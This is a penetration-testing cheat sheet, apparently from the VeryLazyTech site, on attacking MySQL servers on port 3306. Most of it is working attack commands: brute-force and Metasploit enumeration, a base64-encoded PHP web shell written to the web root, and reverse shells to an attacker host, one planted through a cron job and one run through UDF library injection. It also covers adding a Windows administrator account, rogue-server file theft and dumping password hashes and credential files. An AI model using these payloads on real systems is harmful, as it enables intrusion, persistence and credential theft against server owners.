# MySql - Port 3306
{% tabs %}
{% tab title="Support VeryLazyTech π" %}
* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! π**
* **Follow** us on:
* **β Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **πΎ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **π Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **πΊ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **π© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **π΅οΈββοΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. π
{% endtab %}
{% endtabs %}
## Basic info
**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases.
**Default port:** 3306
### How to connect?
#### For local:
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
```
#### For remote
```bash
mysql -h -u root
mysql -h -u root@localhost
```
***
### Enumeration
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
#msfconsole
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
{% hint style="warning" %}
Some of the enumeration actions require valid credentials
{% endhint %}
***
## Write any binary data
Once you've used `CONVERT(unhex(...), BINARY)` or `CONVERT(from_base64(...), BINARY)` to generate binary data in MySQL, you can leverage it to **write files directly to the filesystem** using `INTO DUMPFILE`. This is especially powerful when you have `FILE` privileges in MySQL. For example, to drop a **simple PHP web shell**, you could run:
```sql
SELECT CONVERT(from_base64('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+'), BINARY)
INTO DUMPFILE '/var/www/html/shell.php';
```
That writes a PHP shell accessible at `http://target/shell.php?cmd=id`.
You can also write binary payloads (e.g., `.so` or `.dll`) like this:
```sql
SELECT CONVERT(unhex('7f454c46020101000000000000000000...'), BINARY)
INTO DUMPFILE '/tmp/libexploit.so';
```
Or write a malicious cron job:
```sql
SELECT "* * * * * root bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'\n"
INTO DUMPFILE '/etc/cron.d/pwned';
```
These commands let you pivot from database access to full system compromise, persistence, or remote code execution, **all without a traditional shell**.
***
### **MySQL commands**
```bash
show databases;
use ;
connect ;
show tables;
describe ;
show columns from ;
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
#Get a shell with the mysql client user
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name=""
#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
```
```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
#### MySQL Permissions Enumeration
```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();
# Get users, permissions & hashes
SELECT * FROM mysql.user;
#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';
# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```
***
### **Credential Discovery**
If you didnβt get lucky with anonymous login, time to brute.
#### **π§Ύ Default Credentials**
Common ones to try:
* `root:root`
* `root:toor`
* `admin:admin`
#### **π£ Brute Force with Hydra**
```bash
hydra -L users.txt -P passwords.txt mysql://
```
#### **βοΈ Medusa Alternative**
```bash
medusa -h -u root -P passlist.txt -M mysql
```
***
### **Reading Arbitrary Files via MySQL Client Misuse**
One lesser-known but powerful technique involves abusing the **`LOAD DATA LOCAL INFILE`** feature in MySQL/MariaDB. This command, when used with the `LOCAL` keyword, instructs the **client (not the server)** to read a local file and send it to the database server.
If an attacker can **trick a victim's MySQL client** (like the `mysql` CLI or an app with misconfigured DB connections) into connecting to a **malicious server**, that rogue server can request the client to read and send **any local file** β leading to arbitrary file disclosure.
#### π Vulnerable Command Example
```sql
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';
```
Note the keyword `LOCAL` β this is what triggers the client-side file read. If `LOCAL` is omitted, and MySQL is hardened, you may see this error:
```sql
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
This behavior can be exploited by running a **rogue MySQL server** and luring clients into connecting to it (e.g., through phishing, SSRF, or misconfigured dev tools). You can find a working proof of concept here:\
π [Rogue MySQL Server PoC](https://github.com/allyshka/Rogue-MySql-Server)
**Further reading:**
* Full attack walkthrough: [Seebug.org Whitepaper](https://paper.seebug.org/1113/)
* Simplified overview: [RussianSecurity Expert](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
***
### **Privilege Escalation in MySQL**
#### π Check MySQL Service User
Itβs especially dangerous if MySQL is running as **root**, as that can lead to full system compromise. Check who runs MySQL:
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
#### βοΈ Dangerous MySQL Configs to Look For
In `/etc/mysql/my.cnf` or `mysqld.cnf`, pay attention to:
* `user`: Account running MySQL (should NOT be root)
* `secure_file_priv`: If unset, file import/export is unrestricted
* `admin_address`: Exposed MySQL interfaces
* `debug`, `sql_warnings`: Might expose sensitive info in logs
***
### **π Extracting User Credentials and Privileges**
```sql
-- Current session user
SELECT USER();
-- List all users with privileges
SELECT user, password, create_priv, insert_priv, update_priv, alter_priv, delete_priv, drop_priv FROM mysql.user;
-- Full dump with command-line
mysql -u root -p -e "SELECT * FROM mysql.user;"
```
#### π€ Create a New Privileged User
```sql
CREATE USER 'test' IDENTIFIED BY 'test';
GRANT SELECT, CREATE, DROP, UPDATE, DELETE, INSERT ON *.* TO 'test'@'%' IDENTIFIED BY 'mysql' WITH GRANT OPTION;
```
#### π» Get a Local Shell via MySQL
```sql
\! sh
```
Useful in cases where your client has interactive capabilities.
***
### **𧬠Privilege Escalation via Malicious Shared Library (UDF Injection)**
If MySQL is running as root or a privileged user, you can execute OS commands by injecting a **User Defined Function (UDF)** from a compiled `.so` or `.dll`.
#### π¦ Compile UDF Library on Target (Linux)
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
#### π§ͺ Inject Library via SQL
```sql
USE mysql;
CREATE TABLE npn(line BLOB);
INSERT INTO npn VALUES (LOAD_FILE('/tmp/lib_mysqludf_sys.so'));
SHOW VARIABLES LIKE '%plugin%';
-- Example path:
SELECT * FROM npn INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
-- Create function
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
-- Run commands
SELECT sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
SELECT sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```
#### πͺ Windows Variant
```sql
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn VALUES (LOAD_FILE('C://temp//lib_mysqludf_sys.dll'));
SHOW VARIABLES LIKE '%plugin%';
SELECT * FROM npn INTO DUMPFILE 'C://Windows//System32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```
***
### **π Extracting MySQL Passwords from the Filesystem**
If you have file system access, here are some critical files to check:
#### π `/etc/mysql/debian.cnf`
Contains plain-text login credentials for `debian-sys-maint`:
```bash
cat /etc/mysql/debian.cnf
```
#### πΎ `/var/lib/mysql/mysql/user.MYD`
Holds raw MySQL user hashes β extract like this:
```bash
grep -oaE "[-_.a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
This can give you credentials even without database access.
***
## Enabling logging
You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting the following lines:
.png)
## Useful files
Configuration Files
* windows \*
* config.ini
* my.ini
* windows\my.ini
* winnt\my.ini
* \/mysql/data/
* unix
* my.cnf
* /etc/my.cnf
* /etc/mysql/my.cnf
* /var/lib/mysql/my.cnf
* \~/.my.cnf
* /etc/my.cnf
* Command History
* \~/.mysql.history
* Log Files
* connections.log
* update.log
* common.log
***
### **Default MySQL Databases and Tables**
When MySQL or MariaDB is freshly installed, it comes with a set of **default databases and system tables** that play critical roles in authentication, configuration, and user management. The most important of these is the **`mysql`** database, which stores core internal data used by the MySQL server. Inside it, you'll find sensitive tables like:
* `mysql.user` β Stores usernames, password hashes, and global privileges
* `mysql.db` β Defines database-level privileges
* `mysql.tables_priv`, `columns_priv` β Fine-grained access control over specific tables or columns
* `mysql.procs_priv` β Procedure-specific privileges
* `mysql.roles_mapping` β Role-based access configuration (in newer versions)
These tables are often the first target during **post-exploitation**. By querying or dumping them, an attacker can extract valid user accounts, escalate privileges, or even inject backdoor users. For example:
```sql
SELECT user, host, authentication_string FROM mysql.user;
```
Accessing these default tables is essential for both **privilege auditing** and **credential extraction**, and manipulating them can allow the attacker to **create new admin accounts**, **escalate permissions**, or **disable security controls**. Always monitor access to the `mysql` database and restrict usage to only highly trusted administrators.
{% tabs %}
{% tab title="information\_schema" %}
ALL\_PLUGINS
APPLICABLE\_ROLES
CHARACTER\_SETS
CHECK\_CONSTRAINTS
COLLATIONS
COLLATION\_CHARACTER\_SET\_APPLICABILITY
COLUMNS
COLUMN\_PRIVILEGES
ENABLED\_ROLES
ENGINES
EVENTS
FILES
GLOBAL\_STATUS
GLOBAL\_VARIABLES
KEY\_COLUMN\_USAGE
KEY\_CACHES
OPTIMIZER\_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL\_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA\_PRIVILEGES
SESSION\_STATUS
SESSION\_VARIABLES
STATISTICS
SYSTEM\_VARIABLES
TABLES
TABLESPACES
TABLE\_CONSTRAINTS
TABLE\_PRIVILEGES
TRIGGERS
USER\_PRIVILEGES
VIEWS
INNODB\_LOCKS
INNODB\_TRX
INNODB\_SYS\_DATAFILES
INNODB\_FT\_CONFIG
INNODB\_SYS\_VIRTUAL
INNODB\_CMP
INNODB\_FT\_BEING\_DELETED
INNODB\_CMP\_RESET
INNODB\_CMP\_PER\_INDEX
INNODB\_CMPMEM\_RESET
INNODB\_FT\_DELETED
INNODB\_BUFFER\_PAGE\_LRU
INNODB\_LOCK\_WAITS
INNODB\_TEMP\_TABLE\_INFO
INNODB\_SYS\_INDEXES
INNODB\_SYS\_TABLES
INNODB\_SYS\_FIELDS
INNODB\_CMP\_PER\_INDEX\_RESET
INNODB\_BUFFER\_PAGE
INNODB\_FT\_DEFAULT\_STOPWORD
INNODB\_FT\_INDEX\_TABLE
INNODB\_FT\_INDEX\_CACHE
INNODB\_SYS\_TABLESPACES
INNODB\_METRICS
INNODB\_SYS\_FOREIGN\_COLS
INNODB\_CMPMEM
INNODB\_BUFFER\_POOL\_STATS
INNODB\_SYS\_COLUMNS
INNODB\_SYS\_FOREIGN
INNODB\_SYS\_TABLESTATS
GEOMETRY\_COLUMNS
SPATIAL\_REF\_SYS
CLIENT\_STATISTICS
INDEX\_STATISTICS
USER\_STATISTICS
INNODB\_MUTEXES
TABLE\_STATISTICS
INNODB\_TABLESPACES\_ENCRYPTION
user\_variables
INNODB\_TABLESPACES\_SCRUBBING
INNODB\_SYS\_SEMAPHORE\_WAITS
{% endtab %}
{% tab title="Mysql" %}
columns\_priv
column\_stats
db
engine\_cost
event
func
general\_log
gtid\_executed
gtid\_slave\_pos
help\_category
help\_keyword
help\_relation
help\_topic
host
index\_stats
innodb\_index\_stats
innodb\_table\_stats
ndb\_binlog\_index
plugin
proc
procs\_priv
proxies\_priv
roles\_mapping
server\_cost
servers
slave\_master\_info
slave\_relay\_log\_info
slave\_worker\_info
slow\_log
tables\_priv
table\_stats
time\_zone
time\_zone\_leap\_second
time\_zone\_name
time\_zone\_transition
time\_zone\_transition\_type
transaction\_registry
user
{% endtab %}
{% tab title="performance\_schema" %}
accounts
cond\_instances
events\_stages\_current
events\_stages\_history
events\_stages\_history\_long
events\_stages\_summary\_by\_account\_by\_event\_name
events\_stages\_summary\_by\_host\_by\_event\_name
events\_stages\_summary\_by\_thread\_by\_event\_name
events\_stages\_summary\_by\_user\_by\_event\_name
events\_stages\_summary\_global\_by\_event\_name
events\_statements\_current
events\_statements\_history
events\_statements\_history\_long
events\_statements\_summary\_by\_account\_by\_event\_name
events\_statements\_summary\_by\_digest
events\_statements\_summary\_by\_host\_by\_event\_name
events\_statements\_summary\_by\_program
events\_statements\_summary\_by\_thread\_by\_event\_name
events\_statements\_summary\_by\_user\_by\_event\_name
events\_statements\_summary\_global\_by\_event\_name
events\_transactions\_current
events\_transactions\_history
events\_transactions\_history\_long
events\_transactions\_summary\_by\_account\_by\_event\_name
events\_transactions\_summary\_by\_host\_by\_event\_name
events\_transactions\_summary\_by\_thread\_by\_event\_name
events\_transactions\_summary\_by\_user\_by\_event\_name
events\_transactions\_summary\_global\_by\_event\_name
events\_waits\_current
events\_waits\_history
events\_waits\_history\_long
events\_waits\_summary\_by\_account\_by\_event\_name
events\_waits\_summary\_by\_host\_by\_event\_name
events\_waits\_summary\_by\_instance
events\_waits\_summary\_by\_thread\_by\_event\_name
events\_waits\_summary\_by\_user\_by\_event\_name
events\_waits\_summary\_global\_by\_event\_name
file\_instances
file\_summary\_by\_event\_name
file\_summary\_by\_instance
global\_status
global\_variables
host\_cache
hosts
memory\_summary\_by\_account\_by\_event\_name
memory\_summary\_by\_host\_by\_event\_name
memory\_summary\_by\_thread\_by\_event\_name
memory\_summary\_by\_user\_by\_event\_name
memory\_summary\_global\_by\_event\_name
metadata\_locks
mutex\_instances
objects\_summary\_global\_by\_type
performance\_timers
prepared\_statements\_instances
replication\_applier\_configuration
replication\_applier\_status
replication\_applier\_status\_by\_coordinator
replication\_applier\_status\_by\_worker
replication\_connection\_configuration
replication\_connection\_status
replication\_group\_member\_stats
replication\_group\_members
rwlock\_instances
session\_account\_connect\_attrs
session\_connect\_attrs
session\_status
session\_variables
setup\_actors
setup\_consumers
setup\_instruments
setup\_objects
setup\_timers
socket\_instances
socket\_summary\_by\_event\_name
socket\_summary\_by\_instance
status\_by\_account
status\_by\_host
status\_by\_thread
status\_by\_user
table\_handles
table\_io\_waits\_summary\_by\_index\_usage
table\_io\_waits\_summary\_by\_table
table\_lock\_waits\_summary\_by\_table
threads
user\_variables\_by\_thread
users
variables\_by\_thread
{% endtab %}
{% tab title="Sys" %}
host\_summary
host\_summary\_by\_file\_io
host\_summary\_by\_file\_io\_type
host\_summary\_by\_stages
host\_summary\_by\_statement\_latency
host\_summary\_by\_statement\_type
innodb\_buffer\_stats\_by\_schema
innodb\_buffer\_stats\_by\_table
innodb\_lock\_waits
io\_by\_thread\_by\_latency
io\_global\_by\_file\_by\_bytes
io\_global\_by\_file\_by\_latency
io\_global\_by\_wait\_by\_bytes
io\_global\_by\_wait\_by\_latency
latest\_file\_io
memory\_by\_host\_by\_current\_bytes
memory\_by\_thread\_by\_current\_bytes
memory\_by\_user\_by\_current\_bytes
memory\_global\_by\_current\_bytes
memory\_global\_total
metrics
processlist
ps\_check\_lost\_instrumentation
schema\_auto\_increment\_columns
schema\_index\_statistics
schema\_object\_overview
schema\_redundant\_indexes
schema\_table\_lock\_waits
schema\_table\_statistics
schema\_table\_statistics\_with\_buffer
schema\_tables\_with\_full\_table\_scans
schema\_unused\_indexes
session
session\_ssl\_status
statement\_analysis
statements\_with\_errors\_or\_warnings
statements\_with\_full\_table\_scans
statements\_with\_runtimes\_in\_95th\_percentile
statements\_with\_sorting
statements\_with\_temp\_tables
sys\_config
user\_summary
user\_summary\_by\_file\_io
user\_summary\_by\_file\_io\_type
user\_summary\_by\_stages
user\_summary\_by\_statement\_latency
user\_summary\_by\_statement\_type
version
wait\_classes\_global\_by\_avg\_latency
wait\_classes\_global\_by\_latency
waits\_by\_host\_by\_latency
waits\_by\_user\_by\_latency
waits\_global\_by\_latency
x$host\_summary
x$host\_summary\_by\_file\_io
x$host\_summary\_by\_file\_io\_type
x$host\_summary\_by\_stages
x$host\_summary\_by\_statement\_latency
x$host\_summary\_by\_statement\_type
x$innodb\_buffer\_stats\_by\_schema
x$innodb\_buffer\_stats\_by\_table
x$innodb\_lock\_waits
x$io\_by\_thread\_by\_latency
x$io\_global\_by\_file\_by\_bytes
x$io\_global\_by\_file\_by\_latency
x$io\_global\_by\_wait\_by\_bytes
x$io\_global\_by\_wait\_by\_latency
x$latest\_file\_io
x$memory\_by\_host\_by\_current\_bytes
x$memory\_by\_thread\_by\_current\_bytes
x$memory\_by\_user\_by\_current\_bytes
x$memory\_global\_by\_current\_bytes
x$memory\_global\_total
x$processlist
x$ps\_digest\_95th\_percentile\_by\_avg\_us
x$ps\_digest\_avg\_latency\_distribution
x$ps\_schema\_table\_statistics\_io
x$schema\_flattened\_keys
x$schema\_index\_statistics
x$schema\_table\_lock\_waits
x$schema\_table\_statistics
x$schema\_table\_statistics\_with\_buffer
x$schema\_tables\_with\_full\_table\_scans
x$session
x$statement\_analysis
x$statements\_with\_errors\_or\_warnings
x$statements\_with\_full\_table\_scans
x$statements\_with\_runtimes\_in\_95th\_percentile
x$statements\_with\_sorting
x$statements\_with\_temp\_tables
x$user\_summary
x$user\_summary\_by\_file\_io
x$user\_summary\_by\_file\_io\_type
x$user\_summary\_by\_stages
x$user\_summary\_by\_statement\_latency
x$user\_summary\_by\_statement\_type
x$wait\_classes\_global\_by\_avg\_latency
x$wait\_classes\_global\_by\_latency
x$waits\_by\_host\_by\_latency
x$waits\_by\_user\_by\_latency
x$waits\_global\_by\_latency
{% endtab %}
{% endtabs %}
***
{% embed url="" %}
***
{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)
Support VeryLazyTech π
* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! π**
* **Follow** us on:
* **β Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **πΎ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **π Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **πΊ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **π© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **π΅οΈββοΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. π
{% endhint %}